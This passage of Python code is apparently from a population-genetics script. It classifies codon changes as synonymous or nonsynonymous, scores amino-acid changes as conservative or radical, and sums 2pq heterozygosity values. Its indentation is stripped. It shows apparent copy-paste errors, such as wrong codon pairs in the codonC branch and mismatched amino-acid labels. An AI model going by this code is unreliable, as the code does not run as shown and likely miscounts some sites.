if mutType[7] <= 0.5:
meanConS += 1
sum2PQ_meanC += twoPQ
else:
meanRadS += 1
sum2PQ_meanR += twoPQ
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ) + '\n')
elif totalChanges == 2:
if len(currAlleleDict) == 3:
ab = 0
ac = 0
bc = 0
codonA = currAlleleList[0]
codonB = currAlleleList[1]
codonC = currAlleleList[2]
if codonA[0] != codonB[0]:
ab += 1
if codonA[1] != codonB[1]:
ab += 1
if codonA[2] != codonB[2]:
ab += 1
if codonA[0] != codonC[0]:
ac += 1
if codonA[1] != codonC[1]:
ac += 1
if codonA[2] != codonC[2]:
ac += 1
if codonC[0] != codonB[0]:
bc += 1
if codonC[1] != codonB[1]:
bc += 1
if codonC[2] != codonB[2]:
bc += 1
if ab == ac and ac == bc:
if 'N' not in outCodon and '-' not in outCodon:
if outCodon == codonA:
aaList1 = [currAADict[codonA],currAADict[codonB]]
aaList2 = [currAADict[codonA],currAADict[codonC]]
codonList1 = [codonA,codonB]
codonList2 = [codonA,codonC]
if aaList1[0] == aaList1[1]:
if aaList2[0] == aaList2[1]:
synS += 2
twoPQ = 4
for allele in currFreqDict:
twoPQ *= currFreqDict[allele]
sum2PQ_S += twoPQ
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ) + '\n')
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ) + '\n')
else:
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #syn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #nsyn
sum2PQ_S += twoPQ1
sum2PQ_N += twoPQ2
synS += 1
nsynS += 1
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList1[0] + ',freq=' + str(currFreqDict[codonList1[0]]))
for codon in codonList1[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList1[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ1) + '\n')
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList2[0] + ',freq=' + str(currFreqDict[codonList2[0]]))
for codon in codonList2[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + ';' + aaList2[1] + '\tP\tN')
mutType = CRI(aaList2) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
con1S += 1
sum2PQ_C1 += twoPQ2
else:
rad1S += 1
sum2PQ_R1 += twoPQ2
if mutType[1] == 0:
con2S += 1
sum2PQ_C2 += twoPQ2
else:
rad2S += 1
sum2PQ_R2 += twoPQ2
if mutType[2] == 0:
con3S += 1
sum2PQ_C3 += twoPQ2
else:
rad3S += 1
sum2PQ_R3 += twoPQ2
if mutType[3] == 0:
con4S += 1
sum2PQ_C4 += twoPQ2
else:
rad4S += 1
sum2PQ_R4 += twoPQ2
if mutType[4] == 0:
con5S += 1
sum2PQ_C5 += twoPQ2
else:
rad5S += 1
sum2PQ_R5 += twoPQ2
if mutType[5] == 0:
con6S += 1
sum2PQ_C6 += twoPQ2
else:
rad6S += 1
sum2PQ_R6 += twoPQ2
if mutType[6] == 0:
con7S += 1
sum2PQ_C7 += twoPQ2
else:
rad7S += 1
sum2PQ_R7 += twoPQ2
if mutType[7] <= 0.5:
meanConS += 1
sum2PQ_meanC += twoPQ2
else:
meanRadS += 1
sum2PQ_meanR += twoPQ2
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ2) + '\n')
elif aaList2[0] == aaList2[1]:
nsynS += 1
synS += 1
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #nsyn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #syn
sum2PQ_S += twoPQ2
sum2PQ_N += twoPQ1
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList2[0] + ',freq=' + str(currFreqDict[codonList2[0]]))
for codon in codonList2[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ2) + '\n')
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList1[0] + ',freq=' + str(currFreqDict[codonList1[0]]))
for codon in codonList1[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + ';' + aaList2[1] + '\tP\tN')
mutType = CRI(aaList1) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
con1S += 1
sum2PQ_C1 += twoPQ1
else:
rad1S += 1
sum2PQ_R1 += twoPQ1
if mutType[1] == 0:
con2S += 1
sum2PQ_C2 += twoPQ1
else:
rad2S += 1
sum2PQ_R2 += twoPQ1
if mutType[2] == 0:
con3S += 1
sum2PQ_C3 += twoPQ1
else:
rad3S += 1
sum2PQ_R3 += twoPQ1
if mutType[3] == 0:
con4S += 1
sum2PQ_C4 += twoPQ1
else:
rad4S += 1
sum2PQ_R4 += twoPQ1
if mutType[4] == 0:
con5S += 1
sum2PQ_C5 += twoPQ1
else:
rad5S += 1
sum2PQ_R5 += twoPQ1
if mutType[5] == 0:
con6S += 1
sum2PQ_C6 += twoPQ1
else:
rad6S += 1
sum2PQ_R6 += twoPQ1
if mutType[6] == 0:
con7S += 1
sum2PQ_C7 += twoPQ1
else:
rad7S += 1
sum2PQ_R7 += twoPQ1
if mutType[7] <= 0.5:
meanConS += 1
sum2PQ_meanC += twoPQ1
else:
meanRadS += 1
sum2PQ_meanR += twoPQ1
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ1) + '\n')
else:
nsynS += 2
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #nsyn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #nsyn
sum2PQ_N += twoPQ1 + twoPQ2
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList1[0] + ',freq=' + str(currFreqDict[codonList1[0]]))
for codon in codonList1[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + ';' + aaList2[1] + '\tP\tN')
mutType = CRI(aaList1) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
con1S += 1
sum2PQ_C1 += twoPQ1
else:
rad1S += 1
sum2PQ_R1 += twoPQ1
if mutType[1] == 0:
con2S += 1
sum2PQ_C2 += twoPQ1
else:
rad2S += 1
sum2PQ_R2 += twoPQ1
if mutType[2] == 0:
con3S += 1
sum2PQ_C3 += twoPQ1
else:
rad3S += 1
sum2PQ_R3 += twoPQ1
if mutType[3] == 0:
con4S += 1
sum2PQ_C4 += twoPQ1
else:
rad4S += 1
sum2PQ_R4 += twoPQ1
if mutType[4] == 0:
con5S += 1
sum2PQ_C5 += twoPQ1
else:
rad5S += 1
sum2PQ_R5 += twoPQ1
if mutType[5] == 0:
con6S += 1
sum2PQ_C6 += twoPQ1
else:
rad6S += 1
sum2PQ_R6 += twoPQ1
if mutType[6] == 0:
con7S += 1
sum2PQ_C7 += twoPQ1
else:
rad7S += 1
sum2PQ_R7 += twoPQ1
if mutType[7] <= 0.5:
meanConS += 1
sum2PQ_meanC += twoPQ1
else:
meanRadS += 1
sum2PQ_meanR += twoPQ1
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ1) + '\n')
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList2[0] + ',freq=' + str(currFreqDict[codonList2[0]]))
for codon in codonList2[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + ';' + aaList2[1] + '\tP\tN')
mutType = CRI(aaList2) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
con1S += 1
sum2PQ_C1 += twoPQ2
else:
rad1S += 1
sum2PQ_R1 += twoPQ2
if mutType[1] == 0:
con2S += 1
sum2PQ_C2 += twoPQ2
else:
rad2S += 1
sum2PQ_R2 += twoPQ2
if mutType[2] == 0:
con3S += 1
sum2PQ_C3 += twoPQ2
else:
rad3S += 1
sum2PQ_R3 += twoPQ2
if mutType[3] == 0:
con4S += 1
sum2PQ_C4 += twoPQ2
else:
rad4S += 1
sum2PQ_R4 += twoPQ2
if mutType[4] == 0:
con5S += 1
sum2PQ_C5 += twoPQ2
else:
rad5S += 1
sum2PQ_R5 += twoPQ2
if mutType[5] == 0:
con6S += 1
sum2PQ_C6 += twoPQ2
else:
rad6S += 1
sum2PQ_R6 += twoPQ2
if mutType[6] == 0:
con7S += 1
sum2PQ_C7 += twoPQ2
else:
rad7S += 1
sum2PQ_R7 += twoPQ2
if mutType[7] <= 0.5:
meanConS += 1
sum2PQ_meanC += twoPQ2
else:
meanRadS += 1
sum2PQ_meanR += twoPQ2
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ2) + '\n')
elif outCodon == codonB:
aaList1 = [currAADict[codonB],currAADict[codonA]]
aaList2 = [currAADict[codonB],currAADict[codonC]]
codonList1 = [codonB,codonA]
codonList2 = [codonB,codonC]
if aaList1[0] == aaList1[1]:
if aaList2[0] == aaList2[1]:
synS += 2
twoPQ = 4
for allele in currFreqDict:
twoPQ *= currFreqDict[allele]
sum2PQ_S += twoPQ
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ) + '\n')
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ) + '\n')
else:
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #syn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #nsyn
sum2PQ_S += twoPQ1
sum2PQ_N += twoPQ2
synS += 1
nsynS += 1
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList1[0] + ',freq=' + str(currFreqDict[codonList1[0]]))
for codon in codonList1[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList1[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ1) + '\n')
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList2[0] + ',freq=' + str(currFreqDict[codonList2[0]]))
for codon in codonList2[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + ';' + aaList2[1] + '\tP\tN')
mutType = CRI(aaList2) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
con1S += 1
sum2PQ_C1 += twoPQ2
else:
rad1S += 1
sum2PQ_R1 += twoPQ2
if mutType[1] == 0:
con2S += 1
sum2PQ_C2 += twoPQ2
else:
rad2S += 1
sum2PQ_R2 += twoPQ2
if mutType[2] == 0:
con3S += 1
sum2PQ_C3 += twoPQ2
else:
rad3S += 1
sum2PQ_R3 += twoPQ2
if mutType[3] == 0:
con4S += 1
sum2PQ_C4 += twoPQ2
else:
rad4S += 1
sum2PQ_R4 += twoPQ2
if mutType[4] == 0:
con5S += 1
sum2PQ_C5 += twoPQ2
else:
rad5S += 1
sum2PQ_R5 += twoPQ2
if mutType[5] == 0:
con6S += 1
sum2PQ_C6 += twoPQ2
else:
rad6S += 1
sum2PQ_R6 += twoPQ2
if mutType[6] == 0:
con7S += 1
sum2PQ_C7 += twoPQ2
else:
rad7S += 1
sum2PQ_R7 += twoPQ2
if mutType[7] <= 0.5:
meanConS += 1
sum2PQ_meanC += twoPQ2
else:
meanRadS += 1
sum2PQ_meanR += twoPQ2
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ2) + '\n')
elif aaList2[0] == aaList2[1]:
nsynS += 1
synS += 1
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #nsyn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #syn
sum2PQ_S += twoPQ2
sum2PQ_N += twoPQ1
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList2[0] + ',freq=' + str(currFreqDict[codonList2[0]]))
for codon in codonList2[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ2) + '\n')
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList1[0] + ',freq=' + str(currFreqDict[codonList1[0]]))
for codon in codonList1[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + ';' + aaList2[1] + '\tP\tN')
mutType = CRI(aaList1) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
con1S += 1
sum2PQ_C1 += twoPQ1
else:
rad1S += 1
sum2PQ_R1 += twoPQ1
if mutType[1] == 0:
con2S += 1
sum2PQ_C2 += twoPQ1
else:
rad2S += 1
sum2PQ_R2 += twoPQ1
if mutType[2] == 0:
con3S += 1
sum2PQ_C3 += twoPQ1
else:
rad3S += 1
sum2PQ_R3 += twoPQ1
if mutType[3] == 0:
con4S += 1
sum2PQ_C4 += twoPQ1
else:
rad4S += 1
sum2PQ_R4 += twoPQ1
if mutType[4] == 0:
con5S += 1
sum2PQ_C5 += twoPQ1
else:
rad5S += 1
sum2PQ_R5 += twoPQ1
if mutType[5] == 0:
con6S += 1
sum2PQ_C6 += twoPQ1
else:
rad6S += 1
sum2PQ_R6 += twoPQ1
if mutType[6] == 0:
con7S += 1
sum2PQ_C7 += twoPQ1
else:
rad7S += 1
sum2PQ_R7 += twoPQ1
if mutType[7] <= 0.5:
meanConS += 1
sum2PQ_meanC += twoPQ1
else:
meanRadS += 1
sum2PQ_meanR += twoPQ1
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ1) + '\n')
else:
nsynS += 2
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #nsyn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #nsyn
sum2PQ_N += twoPQ1 + twoPQ2
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList1[0] + ',freq=' + str(currFreqDict[codonList1[0]]))
for codon in codonList1[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + ';' + aaList2[1] + '\tP\tN')
mutType = CRI(aaList1) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
con1S += 1
sum2PQ_C1 += twoPQ1
else:
rad1S += 1
sum2PQ_R1 += twoPQ1
if mutType[1] == 0:
con2S += 1
sum2PQ_C2 += twoPQ1
else:
rad2S += 1
sum2PQ_R2 += twoPQ1
if mutType[2] == 0:
con3S += 1
sum2PQ_C3 += twoPQ1
else:
rad3S += 1
sum2PQ_R3 += twoPQ1
if mutType[3] == 0:
con4S += 1
sum2PQ_C4 += twoPQ1
else:
rad4S += 1
sum2PQ_R4 += twoPQ1
if mutType[4] == 0:
con5S += 1
sum2PQ_C5 += twoPQ1
else:
rad5S += 1
sum2PQ_R5 += twoPQ1
if mutType[5] == 0:
con6S += 1
sum2PQ_C6 += twoPQ1
else:
rad6S += 1
sum2PQ_R6 += twoPQ1
if mutType[6] == 0:
con7S += 1
sum2PQ_C7 += twoPQ1
else:
rad7S += 1
sum2PQ_R7 += twoPQ1
if mutType[7] <= 0.5:
meanConS += 1
sum2PQ_meanC += twoPQ1
else:
meanRadS += 1
sum2PQ_meanR += twoPQ1
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ1) + '\n')
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList2[0] + ',freq=' + str(currFreqDict[codonList2[0]]))
for codon in codonList2[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + ';' + aaList2[1] + '\tP\tN')
mutType = CRI(aaList2) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
con1S += 1
sum2PQ_C1 += twoPQ2
else:
rad1S += 1
sum2PQ_R1 += twoPQ2
if mutType[1] == 0:
con2S += 1
sum2PQ_C2 += twoPQ2
else:
rad2S += 1
sum2PQ_R2 += twoPQ2
if mutType[2] == 0:
con3S += 1
sum2PQ_C3 += twoPQ2
else:
rad3S += 1
sum2PQ_R3 += twoPQ2
if mutType[3] == 0:
con4S += 1
sum2PQ_C4 += twoPQ2
else:
rad4S += 1
sum2PQ_R4 += twoPQ2
if mutType[4] == 0:
con5S += 1
sum2PQ_C5 += twoPQ2
else:
rad5S += 1
sum2PQ_R5 += twoPQ2
if mutType[5] == 0:
con6S += 1
sum2PQ_C6 += twoPQ2
else:
rad6S += 1
sum2PQ_R6 += twoPQ2
if mutType[6] == 0:
con7S += 1
sum2PQ_C7 += twoPQ2
else:
rad7S += 1
sum2PQ_R7 += twoPQ2
if mutType[7] <= 0.5:
meanConS += 1
sum2PQ_meanC += twoPQ2
else:
meanRadS += 1
sum2PQ_meanR += twoPQ2
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ2) + '\n')
elif outCodon == codonC:
aaList1 = [currAADict[codonC],currAADict[codonA]]
aaList2 = [currAADict[codonC],currAADict[codonB]]
codonList1 = [codonA,codonB]
codonList2 = [codonA,codonC]
if aaList1[0] == aaList1[1]:
if aaList2[0] == aaList2[1]:
synS += 2
twoPQ = 4
for allele in currFreqDict:
twoPQ *= currFreqDict[allele]
sum2PQ_S += twoPQ
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ) + '\n')
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ) + '\n')
else:
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #syn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #nsyn
sum2PQ_S += twoPQ1
sum2PQ_N += twoPQ2
synS += 1
nsynS += 1
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList1[0] + ',freq=' + str(currFreqDict[codonList1[0]]))
for codon in codonList1[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList1[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ1) + '\n')
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList2[0] + ',freq=' + str(currFreqDict[codonList2[0]]))
for codon in codonList2[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + ';' + aaList2[1] + '\tP\tN')
mutType = CRI(aaList2) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
con1S += 1
sum2PQ_C1 += twoPQ2
else:
rad1S += 1
sum2PQ_R1 += twoPQ2
if mutType[1] == 0:
con2S += 1
sum2PQ_C2 += twoPQ2
else:
rad2S += 1
sum2PQ_R2 += twoPQ2
if mutType[2] == 0:
con3S += 1
sum2PQ_C3 += twoPQ2
else:
rad3S += 1
sum2PQ_R3 += twoPQ2
if mutType[3] == 0:
con4S += 1
sum2PQ_C4 += twoPQ2
else:
rad4S += 1
sum2PQ_R4 += twoPQ2
if mutType[4] == 0:
con5S += 1
sum2PQ_C5 += twoPQ2
else:
rad5S += 1
sum2PQ_R5 += twoPQ2
if mutType[5] == 0:
con6S += 1
sum2PQ_C6 += twoPQ2
else:
rad6S += 1
sum2PQ_R6 += twoPQ2
if mutType[6] == 0:
con7S += 1
sum2PQ_C7 += twoPQ2
else:
rad7S += 1
sum2PQ_R7 += twoPQ2
if mutType[7] <= 0.5:
meanConS += 1
sum2PQ_meanC += twoPQ2
else:
meanRadS += 1
sum2PQ_meanR += twoPQ2
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ2) + '\n')
elif aaList2[0] == aaList2[1]:
nsynS += 1
synS += 1
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #nsyn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #syn
sum2PQ_S += twoPQ2
sum2PQ_N += twoPQ1
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList2[0] + ',freq=' + str(currFreqDict[codonList2[0]]))
for codon in codonList2[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ2) + '\n')
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList1[0] + ',freq=' + str(currFreqDict[codonList1[0]]))
for codon in codonList1[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + ';' + aaList2[1] + '\tP\tN')
mutType = CRI(aaList1) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
con1S += 1
sum2PQ_C1 += twoPQ1
else:
rad1S += 1
sum2PQ_R1 += twoPQ1
if mutType[1] == 0:
con2S += 1
sum2PQ_C2 += twoPQ1
else:
rad2S += 1
sum2PQ_R2 += twoPQ1
if mutType[2] == 0:
con3S += 1
sum2PQ_C3 += twoPQ1
else:
rad3S += 1
sum2PQ_R3 += twoPQ1
if mutType[3] == 0:
con4S += 1
sum2PQ_C4 += twoPQ1
else:
rad4S += 1
sum2PQ_R4 += twoPQ1
if mutType[4] == 0:
con5S += 1
sum2PQ_C5 += twoPQ1
else:
rad5S += 1
sum2PQ_R5 += twoPQ1
if mutType[5] == 0:
con6S += 1
sum2PQ_C6 += twoPQ1
else:
rad6S += 1
sum2PQ_R6 += twoPQ1
if mutType[6] == 0:
con7S += 1
sum2PQ_C7 += twoPQ1
else:
rad7S += 1
sum2PQ_R7 += twoPQ1
if mutType[7] <= 0.5:
meanConS += 1
sum2PQ_meanC += twoPQ1
else:
meanRadS += 1
sum2PQ_meanR += twoPQ1
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ1) + '\n')
else:
nsynS += 2
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #nsyn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #nsyn
sum2PQ_N += twoPQ1 + twoPQ2
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList1[0] + ',freq=' + str(currFreqDict[codonList1[0]]))
for codon in codonList1[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + ';' + aaList2[1] + '\tP\tN')
mutType = CRI(aaList1) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
con1S += 1
sum2PQ_C1 += twoPQ1
else:
rad1S += 1
sum2PQ_R1 += twoPQ1
if mutType[1] == 0:
con2S += 1
sum2PQ_C2 += twoPQ1
else:
rad2S += 1
sum2PQ_R2 += twoPQ1
if mutType[2] == 0:
con3S += 1
sum2PQ_C3 += twoPQ1
else:
rad3S += 1
sum2PQ_R3 += twoPQ1
if mutType[3] == 0:
con4S += 1
sum2PQ_C4 += twoPQ1
else:
rad4S += 1
sum2PQ_R4 += twoPQ1
if mutType[4] == 0:
con5S += 1
sum2PQ_C5 += twoPQ1
else:
rad5S += 1
sum2PQ_R5 += twoPQ1
if mutType[5] == 0:
con6S += 1
sum2PQ_C6 += twoPQ1
else:
rad6S += 1
sum2PQ_R6 += twoPQ1
if mutType[6] == 0:
con7S += 1
sum2PQ_C7 += twoPQ1
else:
rad7S += 1
sum2PQ_R7 += twoPQ1
if mutType[7] <= 0.5:
meanConS += 1
sum2PQ_meanC += twoPQ1
else:
meanRadS += 1
sum2PQ_meanR += twoPQ1
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ1) + '\n')
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList2[0] + ',freq=' + str(currFreqDict[codonList2[0]]))
for codon in codonList2[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + ';' + aaList2[1] + '\tP\tN')
mutType = CRI(aaList2) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
con1S += 1
sum2PQ_C1 += twoPQ2
else:
rad1S += 1
sum2PQ_R1 += twoPQ2
if mutType[1] == 0:
con2S += 1
sum2PQ_C2 += twoPQ2
else:
rad2S += 1
sum2PQ_R2 += twoPQ2
if mutType[2] == 0:
con3S += 1
sum2PQ_C3 += twoPQ2
else:
rad3S += 1
sum2PQ_R3 += twoPQ2
if mutType[3] == 0:
con4S += 1
sum2PQ_C4 += twoPQ2
else:
rad4S += 1
sum2PQ_R4 += twoPQ2
if mutType[4] == 0:
con5S += 1
sum2PQ_C5 += twoPQ2
else:
rad5S += 1
sum2PQ_R5 += twoPQ2
if mutType[5] == 0:
con6S += 1
sum2PQ_C6 += twoPQ2
else:
rad6S += 1
sum2PQ_R6 += twoPQ2
if mutType[6] == 0:
con7S += 1
sum2PQ_C7 += twoPQ2
else:
rad7S += 1
sum2PQ_R7 += twoPQ2
if mutType[7] <= 0.5:
meanConS += 1
sum2PQ_meanC += twoPQ2
else:
meanRadS += 1
sum2PQ_meanR += twoPQ2
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
